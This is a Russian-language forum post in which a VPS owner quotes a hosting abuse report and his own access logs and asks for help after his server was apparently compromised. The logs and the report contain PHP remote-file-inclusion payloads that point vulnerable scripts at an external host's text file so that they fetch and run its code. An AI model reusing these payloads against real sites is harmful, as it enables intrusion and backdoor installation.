DOS Attack с моего сервера

Получил от хостера письмо такого содержания:

 Hack Attempted to our domain www.microcyb.com from IP Address: 195.138.198.75 using host: colo-198-75.hostbizua.com on 07-31-2008 8:47 am EDT.

Hijacking injection script URL 43/index.php?id=http://www.topyn.com/bajo.txt?? has been reported to the FBI Cyber Crime division.

Date: 07-31-2008

Time: 8:47 am

Time Zone: EDT

Hack IP Address: 195.138.198.75

Port: 80

Hacking Using Host: colo-198-75.hostbizua.com

Hacking Script URL: 43/index.php?id=http://www.topyn.com/bajo.txt??

Appears the colo-198-75.hostbizua.com server has been compromised to allow 3rd party inbound traffic.

They are trying to inject the Linux.Backdoor.Small.o or similar

Might be they are using word press or a similar PHP application and got infected, allowing third party processes to use your hosting server.Possible Solution Used: Apply ACL to deny 3rd party DNS, hosted webservices (Inbound traffic from destination port 80) and any outbound traffic either source or destination using ports: 6, 8, 17, 1025, 1433, 1434, 1435, 2798, 2967, 2968, 5761, & 5900.

Ну и еще хостер потребровал принять меры.

Я не очень все это понимаю. У меня сайты на VPS, IP 195.138.198.75 мой.

Порылся в логах, нашел достаточно много записей типа:

195.138.198.75 - - [01/Aug/2008:05:35:53 +0300] "GET /?_SERVER%5bDOCUMENT_ROOT%5d=http://www.topyn.com/bajo.txt%3f%3f HTTP/1.1" 200 44434 "-" "libwww-perl/5.805"

195.138.198.75 - - [01/Aug/2008:05:35:54 +0300] "GET /?_SERVER%5bDOCUMENT_ROOT%5d=http://www.topyn.com/bajo.txt%3f%3f HTTP/1.1" 200 44436 "-" "libwww-perl/5.805"

195.138.198.75 - - [01/Aug/2008:05:35:55 +0300] "GET /?_SERVER%5bDOCUMENT_ROOT%5d=http://www.topyn.com/bajo.txt%3f%3f HTTP/1.1" 200 44459 "-" "libwww-perl/5.805"

195.138.198.75 - - [01/Aug/2008:05:48:42 +0300] "GET /about/?_SERVER%5bDOCUMENT_ROOT%5d=http://www.topyn.com/bajo.txt%3f%3f HTTP/1.1" 404 1537 "-" "libwww-perl/5.805"

195.138.198.75 - - [01/Aug/2008:05:48:43 +0300] "GET /?_SERVER%5bDOCUMENT_ROOT%5d=http://www.topyn.com/bajo.txt%3f%3f HTTP/1.1" 200 44460 "-" "libwww-perl/5.805"

195.138.198.75 - - [01/Aug/2008:06:19:47 +0300] "GET /kb/phpmanual//index.php?_SERVER%5bDOCUMENT_ROOT%5d=http://www.topyn.com/bajo.txt%3f%3f HTTP/1.1" 404 1537 "-" "libwww-perl/5.805"

195.138.198.75 - - [01/Aug/2008:06:39:27 +0300] "GET /search//index.php?_SERVER%5bDOCUMENT_ROOT%5d=http://www.topyn.com/bajo.txt%3f%3f HTTP/1.1" 200 26 "-" "libwww-perl/5.805"

195.138.198.75 - - [01/Aug/2008:06:40:25 +0300] "GET /?_SERVER%5bDOCUMENT_ROOT%5d=http://www.topyn.com/bajo.txt%3f%3f HTTP/1.1" 200 44436 "-" "libwww-perl/5.805"

195.138.198.75 - - [01/Aug/2008:06:40:26 +0300] "GET /?_SERVER%5bDOCUMENT_ROOT%5d=http://www.topyn.com/bajo.txt%3f%3f HTTP/1.1" 200 44437 "-" "libwww-perl/5.805"

195.138.198.75 - - [01/Aug/2008:06:55:42 +0300] "GET /BANNED-for-questionable-behavior/070926-FU-x32dVGVUrNM5eqJdNkXeqUSzWH?_SERVER%5bDOCUMENT_ROOT%5d=http://www.topyn.com/bajo.txt%3f%3f HTTP/1.1" 404 1537 "-" "libwww-perl/5.805"

195.138.198.75 - - [01/Aug/2008:07:11:37 +0300] "GET /?_SERVER%5bDOCUMENT_ROOT%5d=http://www.topyn.com/bajo.txt%3f%3f HTTP/1.1" 200 44460 "-" "libwww-perl/5.805"

195.138.198.75 - - [01/Aug/2008:10:18:57 +0300] "GET /BANNED-for-questionable-behavior/070926-FU-x32dVGVUrNM5eqJdNkXeqUSzWH?_SERVER%5bDOCUMENT_ROOT%5d=http://www.topyn.com/bajo.txt%3f%3f HTTP/1.1" 404 1537 "-" "libwww-perl/5.805"

Что вобще происходит, как с этим бороться не знаю. Надеюсь знающие подскажут.

если это вирус "Linux.Backdoor.Small.o", чем лечится?